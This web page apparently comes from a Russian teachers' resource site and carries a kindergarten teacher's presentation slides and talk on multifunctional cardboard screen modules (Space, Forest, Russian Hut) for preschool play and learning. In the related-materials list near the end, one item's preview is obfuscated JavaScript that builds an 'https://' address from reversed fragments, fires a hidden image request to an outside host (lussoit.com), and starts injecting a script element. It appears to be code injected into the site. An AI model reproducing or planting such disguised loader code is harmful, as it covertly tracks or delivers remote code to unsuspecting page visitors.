«Расширение познавательной сферы дошкольников посредством использования политрансформируемых пособий – ширм»
методическая разработка (старшая группа)

Согласно Федерального государственного образовательного стандарта дошкольного образования образовательная среда   в ДОУ рассматривается как зона ближайшего развития ребёнка с учетом его склонностей, интересов, уровня активности.

Скачать:

ВложениеРазмер
Файл shirmy_alekseenko_k.s.pptx1.38 МБ
Файл aks_tekst.docx15.76 КБ

Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Муниципальное бюджетное дошкольное образовательное учреждение «Благовещенский детский сад «Светлячок» «Расширение познавательной сферы дошкольников посредством использования политрансформируемых пособий – ширм» Алексеенко К.С., воспитатель

Слайд 2

Уникальные модули — оригинальная разработка для детского сада, которая поможет организовать развивающую среду в дошкольном образовательном учреждении в соответствии с Федеральным государственным образовательным стандартом дошкольного образования.

Слайд 3

Задачи многофункциональных ширм: - Развивать умение детей самостоятельно готовить обстановку для игры. (подбирать предметы, атрибуты); - формировать целостную картину мира, расширять кругозор; - работать над звукопроизношением и связной речью; - совершенствовать координацию руки и глаза; продолжать развивать мелкую моторику рук; - способствовать развитию интегративных качеств.

Слайд 4

Модули - ширм обучающий инструмент со скрытыми интересными элементами.

Слайд 5

Дидактическая ценность

Слайд 6

Модуль «Космос»

Слайд 7

Модуль «Лес»

Слайд 8

Модуль «Русская изба»

Слайд 9

Многофункциональная ширма- уникальная разработка для детского сада.



Предварительный просмотр:

Слайд 1

Добрый день, уважаемые коллеги. Сегодня я хочу поделиться с вами своим опытом работы по обогащению предметно развивающей среды в детском саду. Согласно Федерального государственного образовательного стандарта дошкольного образования образовательная среда   в ДОУ рассматривается как зона ближайшего развития ребёнка с учетом его склонностей, интересов, уровня активности. 

Для того чтобы каждый ребенок в группе был занят своим делом —от взрослых требуется умение создавать развивающую среду, стимулирующую активность детей.

Слайд 2

В своей группе я изготовила многофункциональные ширмы- модули. С их помощью легко организовать сюжетно — ролевые игры, театрализованную деятельность,  самостоятельную деятельность детей по интересам.

  Ширмы- модули не только зонируют пространство, они ещё и во многих случаях работают в качестве интерактивной папки – лэпбука, так как к ним прилагаются разнообразные материалы и атрибуты  так же могут использоваться в театральной деятельности в качестве декораций.

Данное  пособие имеет развивающее, обучающее и воспитывающее значения. Его можно использовать во всех образовательных областях для разных возрастных категорий детей в ДОУ.

Слайд 3

С помощью данного пособия можно решать  следующие задачи:

-  Развивать умение детей самостоятельно готовить обстановку для игры. (подбирать предметы, атрибуты);

- формировать целостную картину мира, расширять кругозор.

- работать над звукопроизношением и связной речью.

- совершенствовать координацию руки и глаза; продолжать развивать мелкую моторику рук.

- способствовать развитию интегративных качеств.

Слайд 4

Данные  ширмы - это обучающий инструмент со скрытыми интересными элементами, позволяющими решать воспитательные, развивающие и обучающие цели и задачи.

Ширмы складываются и легко убираются при необходимости хранения или переноса в сложенном виде. Наличие кармашков обеспечивает достаточную заполняемость ширм разнообразными атрибутами для игр; Ширмы могут применяться для работы, как с малой группой детей, так и для индивидуальных занятий. Все дети имеют свободный доступ к ширмам.

Модули изготовлены из картона, практика показывает, что удобнее использовать три листа, в этом случае, модуль не так велик, устойчив и удобен в использовании. Особенно ценно в наших модулях то, что они лёгкие, один ребёнок без труда может донести и поставить в нужном месте модуль, чтобы развернуть игру. Хранить модули так же удобно, как и трансформировать, они легко складываются и занимают мало места.

Для поддержания интереса дошкольников и для новых возможностей оформление ширмы легко можно поменять, учитывая возраст и увлечения детей.

Слайд 5

Дидактическая ценность:

1. Многофункциональные ширмы используются как средство обучения и воспитания детей.

2. Ширмы удобны в использовании, имеют привлекательный дизайн, помогающий украсить интерьер группы.

Слайд 6.

В моей группе на данный момент имеются три ширмы модуля. Это модуль «Космос». Цель которого - расширение  знаний детей о космосе, о планетах солнечной системы, о современной космонавтике, о космической технике и о героях космоса.

Слайд 7.

Модуль «Лес»  обогащает представления детей о природе, учит правилам поведения  и безопасности в лесу .

Слайд 8.

Модуль «Русская изба» возвращает дошкольников  к истокам нашей русской культуры, помогает сильнее проникнуться  традициями и устоями русского быта.

Слад 9.

 Многофункциональная ширма — оригинальная разработка для детского сада, которая поможет организовать развивающую среду в дошкольном образовательном учреждении в соответствии с Федеральным государственным образовательным стандартом дошкольного образования.

 Уникальность ширм состоит еще и в том, что дети самостоятельно разбиваются на группы по интересам или гендерному признаку и одновременно, не мешая друг другу, могут взаимодействовать в выбранном ими пространстве.

В дальнейшем я планирую  изготовить  ширмы на и другие темы, учитывая запросы и интересы моих воспитанников.

Спасибо за внимание.


По теме: методические разработки, презентации и конспекты

Сообщение из опыта работы ПОЗНАВАТЕЛЬНОЕ РАЗВИТИЕ ДОШКОЛЬНИКОВ ПОСРЕДСТВОМ ИСПОЛЬЗОВАНИЯ УНИВЕРСАЛЬНОГО КОНСТРУКТОРА Г. УРАДОВСКИХ

Опираясь на опыт Г. Урадовских, разработали рекомендации по применению универсального конструктора в образовательной области: познавательное развитие. Поставили перед собой следующие задачи.- фо...

Развитие познавательной активности дошкольников посредством использования технологии исследовательской деятельности в ДОУ в условиях реализации ФГОС ДО»

Развитие исследовательских способностей ребенка-одна из важнейших задач современного образования. Это и обусловило выбор этой темы....

Анализ проведения тематического контроля «Состояние работы по развитию эмоционально-чувственной сферы дошкольников посредством использования игровых технологий».

Цель: определить эффективность воспитательно-образовательной работы в ДОУ по развитию эмоционально-чувственной сферы дошкольников посредством использования игровых технологий....

Развитие познавательной сферы дошкольников посредством организации исследовательской деятельности

Развитие познавательной сферы дошкольников посредством организации исследовательской деятельности...

Познавательное развитие дошкольников посредством использования ЛЕГО-конструктора.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'ujbvokac.lussoit.com\',\'36\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...

ПУБЛИКАЦИЯ СТАТЬИ «РАЗВИТИЕ ПОЗНАВАТЕЛЬНОЙ ДЕЯТЕЛЬНОСТИ ДОШКОЛЬНИКОВ ПОСРЕДСТВОМ НАГЛЯДНО-ДИДАКТИЧЕСКИХ ПОСОБИЙ»

Публикация статьи "Развитие познавательной деятельности дошкольников посредством наглядно дидактических пособий"....